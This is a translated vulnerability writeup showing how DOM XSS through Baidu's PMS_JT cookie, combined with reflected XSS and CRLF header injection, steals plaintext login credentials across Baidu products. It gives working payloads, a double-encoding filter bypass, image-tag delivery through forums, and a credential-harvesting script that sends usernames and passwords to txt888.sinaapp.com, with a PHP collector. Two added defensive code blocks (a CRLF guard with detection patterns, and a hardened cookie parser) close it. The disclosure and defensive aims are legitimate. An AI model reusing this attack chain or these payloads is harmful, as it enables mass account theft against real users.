A critical vulnerability that can steal Baidu account passwords on a large scale (one trigger compromises the whole product line)
An XSS rootkit: the flaw exists in basically all of Baidu's core businesses (Baidu Tieba, Baidu News, Baidu Zhidao, Baidu Baike, Baidu Music, etc.). Trigger it once and every product is affected.
While analyzing map.baidu.com, it was found that the page's code passes the value of the PMS_JT cookie to eval().
Test
Set the PMS_JT value to alert(1) and visit the page: the alert executes. This confirms a DOM XSS whose source is the cookie, which is what makes an XSS rootkit possible.
Analyzing Baidu's other businesses showed that this is a common problem: basically all core businesses have it.
How to demonstrate the impact?
Verified again here.
First, construct a payload that makes the page load our remote JS, to make testing easier.
Modify PMS_JT to:
document.write('<script src="//txt888.sinaapp.com/test.js"></script>')
Or, URL-encoded:
var%20element%3Ddocument.createElement%28%27script%27%29%3Belement.setAttribute%28%27src%27%2C%20%27http%3A%2f%2ftxt888.sinaapp.com%2ftest.js%27%29%3Bdocument.getElementsByTagName%28%22head%22%29.item%280%29.appendChild%28element%29%3B
Result: triggered successfully.
To trigger this vulnerability, the cookie value must first be modified, so it is combined with a second vulnerability that can do that.
The first method is to use a reflected XSS.
Fuxi's automated penetration testing has found XSS vulnerabilities in multiple baidu.com domains; take one to test:
http://m.apistore.baidu.com/astore/mfaqdetail?tag=0&webTitle=APIStore%E4%BB%8B%E7%BB%8D
First, write the JS that modifies the cookie.
baidu_test.js
    function fSetCookie(c, e, d) {
        var a = ";domain=" + d + ";path=/";
        document.cookie = c + "=" + e + a + ";expires=" + new Date(2099, 12, 31).toGMTString();
    }
    fSetCookie("PMS_JT", "document.write('<script src=\"//txt888.sinaapp.com/test.js\"></script>')", ".baidu.com");
Construct the access URL:
http://m.apistore.baidu.com/astore/mfaqdetail/?tag=0&webTitle=APIStore%E4%BB%8B%E7%BB%8D
The cookie value is modified.
Open tieba.baidu.com: the payload executes successfully.
Continue constructing. The target is to steal the user's plaintext account name and password.
First, analyze the login box.
When _.Module.use("common/widget/LoginDialog", ["", "userBar"]) is executed, the login box is loaded.
Construct the stealing code.
baidu_rookit.js
    function login_jc() {
        a = new Image();
        a.src = "http://txt888.sinaapp.com/form_save.php?user=" + document.getElementById("tangram1_psp_8_userName").value + "&password=" + document.getElementById("tangram?psp_8_password").value;
        return true;
    }
    _.module.use("common/widget/LoginDialog", ["", "userBar"]); // load the login box
    setTimeout("document.getElementById(\"tangram?psp_8_form\").setAttribute(\"onsubmit\", \"login_jc();\")", 5000); // add an onsubmit handler after 5 seconds
Code that saves the submitted data.
form_save.php
    <?php
    function insert($data) {
        $mysql = new SaeMysql();
        $sql = "insert into test(`data`,`time`) values('$data',now())";
        $mysql->runsql($sql);
        $mysql->closeDb();
        if ($mysql->errno() != 0) {
            die("Error:" . $mysql->errmsg());
        }
    }
    if (count($_GET) >= 1) {
        $data = json_encode($_GET);
        insert($data);
        echo 1;
    }
    ?>
Open the login test: the login dialog box is displayed.
The password is intercepted.
With reflected XSS, the attacker still needs the victim to open the attack link, so the success rate and stealth are insufficient. Therefore we combine it with another vulnerability.
CRLF vulnerability
Fuyun's automated penetration testing platform also found multiple CRLF vulnerabilities in the baidu.com domain; take one to test.
Based on the vulnerability, construct a test that adds a cookie.
Access:
http://wenku.baidu.com:80/topic/new/href=/%0aset-cookie:future=future; domain=.baidu.com; path=/%0aa:
The .baidu.com cookie is set successfully. It is sent to every subdomain under the root domain, so the cookie only needs to be planted once and all products can be intercepted.
Construct the request that loads the interception script:
http://wenku.baidu.com:80/topic/new/href=/%0aset-cookie:PMS_JT=document.write%28%27%3Cscript%20src%3D%22%2f%2f%2ftxt888.sinaapp.com%2fbaidu_rookit.js%22%3E%3C%2fscript%3E%27%29; domain=.baidu.com; path=/%0aa:
Set successfully. Open tieba.baidu.com to test.
No response. Why?
Check again.
The original // is filtered to /, so the remote JS cannot be loaded.
How can this be bypassed?
We can use double encoding to bypass the filter.
Construct:
http://wenku.baidu.com:80/topic/new/href=/%0aset-cookie:PMS_JT=document.write%28%27%3Cscript%20src%3D%22%252f%252ftxt888.sinaapp.com%2fbaidu_rookit.js%22%3E%3C%2fscript%3E%27%29; domain=.baidu.com; path=/%0aa:
Access.
Our interception code is loaded and executed.
Because the CRLF vulnerability sets the cookie through a GET request, anything that triggers a GET request can be used for the attack, such as an image tag.
Test access.
Cookie set successfully.
That is to say, an attacker can insert the attack code (images, videos, Flash, etc.) anywhere external resources can be embedded, and steal the account and password while the victim is simply browsing.
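The two defender-side pieces a CRLF issue like the one above calls for, as an added example that is not part of the original writeup or Baidu's code: a header-writing guard that refuses any value containing CR or LF, and a log check that percent-decodes a request path repeatedly (so the %252f-style double encoding shown above is also caught) and flags a newline followed by a Set-Cookie header. The site origin, cookie name and the sample log lines are constructed for the example.

```javascript
// Added example, not from the original writeup. Defender-side handling of
// CRLF header injection. `base`, the cookie name and SAMPLE_LOG are constructed.

// (1) Mitigation: no user-controlled value may reach a response header
// while it contains a carriage return or line feed.
function safeHeaderValue(value) {
  if (/[\r\n]/.test(value)) {
    throw new Error("header value contains CR/LF");
  }
  return value;
}

// Build a Location header from a user-supplied path. The path is decoded
// first, as a server would, so an encoded newline is still caught.
function buildRedirect(base, path) {
  const decoded = decodeURIComponent(path);
  return { name: "Location", value: safeHeaderValue(base + decoded) };
}

// (2) Detection: decode up to `rounds` times so that %250a / %252f style
// double encoding does not slip past a single-pass check.
function fullyDecode(s, rounds = 3) {
  let cur = s;
  for (let i = 0; i < rounds; i++) {
    let next;
    try {
      next = decodeURIComponent(cur);
    } catch (e) {
      break; // malformed escape: stop decoding, check what we have
    }
    if (next === cur) break;
    cur = next;
  }
  return cur;
}

// A line break followed by a header name and a colon inside a request
// path is the signature of an attempted header injection.
const HEADER_INJECTION = /[\r\n]\s*(set-cookie|location|content-type)\s*:/i;

function looksLikeHeaderInjection(requestPath) {
  return HEADER_INJECTION.test(fullyDecode(requestPath));
}

// Constructed sample access-log lines: "METHOD PATH STATUS".
const SAMPLE_LOG = [
  "GET /topic/new/href=/home 200",
  "GET /topic/new/href=/%0aset-cookie:%20evil=1;%20domain=.example.test;%20path=/%0aa: 302",
  "GET /topic/new/href=/%250aset-cookie:%20evil=1 302",
  "GET /search?q=set-cookie 200",
];

// Return the log lines whose request path looks like header injection.
function flagSuspiciousRequests(lines) {
  return lines.filter((line) => {
    const parts = line.split(" ");
    return parts.length >= 2 && looksLikeHeaderInjection(parts[1]);
  });
}

console.log(flagSuspiciousRequests(SAMPLE_LOG));
```

The detection regex deliberately requires the newline and the header name together; a bare "set-cookie" in a query string (the fourth sample line) is not flagged, which keeps the rule usable on real traffic.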
Test
For example, a Discuz (DZ) forum.
Post or reply.
Insert an image and enter this address:
http://wenku.baidu.com:80/topic/new/href=/%0aset-cookie:%20PMS_JT=document.write%28%27%3Cscript%20src%3D%22%252f%252ftxt888.sinaapp.com%2fbaidu_rookit.js%22%3E%3C%2fscript%3E%27%29;%20domain=.baidu.com;%20path=/%0aa:#.jpg
Note: all spaces must be converted to %20.
Cookie modified.
Test login.
The user name and plaintext password are intercepted.
The login boxes of different services differ slightly; the interception code tested above only works for tieba.baidu.com. To cover the entire product line, separate stealing code would have to be written for each product and selected at runtime.
Summary of the attack process: insert the attack code (an image) anywhere external resources can be added, such as social forums, posts, and personal spaces. A victim who views the post or otherwise unknowingly loads the attack code on a normal forum is compromised once, and the next time they log in to any vulnerable Baidu product their user name and password are intercepted and sent to the address specified by the attacker.
Solution:
Be aware that any variable the user can control, including a cookie, is dangerous and must never be executed.
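What the fix looks like on the client side, as an added example that is not part of the original writeup or Baidu's code: the cookie is treated as data, parsed against a strict schema, and never handed to eval(). Only the cookie name PMS_JT comes from the writeup; the expected JSON shape, the allowed keys and the token format are assumptions made for the example, and the sample cookie headers are constructed.

```javascript
// Added example, not from the original writeup. Hardened reader for a
// settings cookie that a page previously passed to eval(). The JSON shape,
// ALLOWED_KEYS and TOKEN are assumptions; cookie headers below are constructed.

const COOKIE_NAME = "PMS_JT";

// Parse a "a=b; c=d" cookie header into a name->value map.
// Splits on ";" and on the first "=" only, so values may contain "=".
function parseCookies(cookieHeader) {
  const out = Object.create(null);
  for (const part of cookieHeader.split(";")) {
    const idx = part.indexOf("=");
    if (idx < 0) continue;
    const name = part.slice(0, idx).trim();
    const value = part.slice(idx + 1).trim();
    if (name) out[name] = value;
  }
  return out;
}

// Assumed schema: a JSON object with a small set of known keys whose
// values are short alphanumeric tokens. Anything else is dropped.
const ALLOWED_KEYS = new Set(["theme", "lang"]);
const TOKEN = /^[A-Za-z0-9_-]{1,32}$/;

// Returns the validated settings. Malformed or unexpected input yields {}.
// There is no fallback path that interprets the raw string as code.
function readSettingsCookie(cookieHeader) {
  const raw = parseCookies(cookieHeader)[COOKIE_NAME];
  if (raw === undefined) return {};
  let decoded;
  try {
    decoded = JSON.parse(decodeURIComponent(raw));
  } catch (e) {
    return {}; // not valid JSON (e.g. an injected script string): ignore it
  }
  if (typeof decoded !== "object" || decoded === null || Array.isArray(decoded)) {
    return {};
  }
  const result = {};
  for (const [key, value] of Object.entries(decoded)) {
    if (ALLOWED_KEYS.has(key) && typeof value === "string" && TOKEN.test(value)) {
      result[key] = value;
    }
  }
  return result;
}

// Constructed inputs: a benign settings cookie and an injected payload of
// the kind described above. The second one is rejected at JSON.parse.
console.log(readSettingsCookie("a=1; PMS_JT=%7B%22theme%22%3A%22dark%22%7D"));
console.log(readSettingsCookie("PMS_JT=document.write('<script src=\"//example.invalid/test.js\"></script>')"));
```

The important property is that the validation is positive (known keys, known value format) rather than a blacklist of dangerous characters; the // to / filter described above is an example of how a blacklist gets bypassed with one extra layer of encoding.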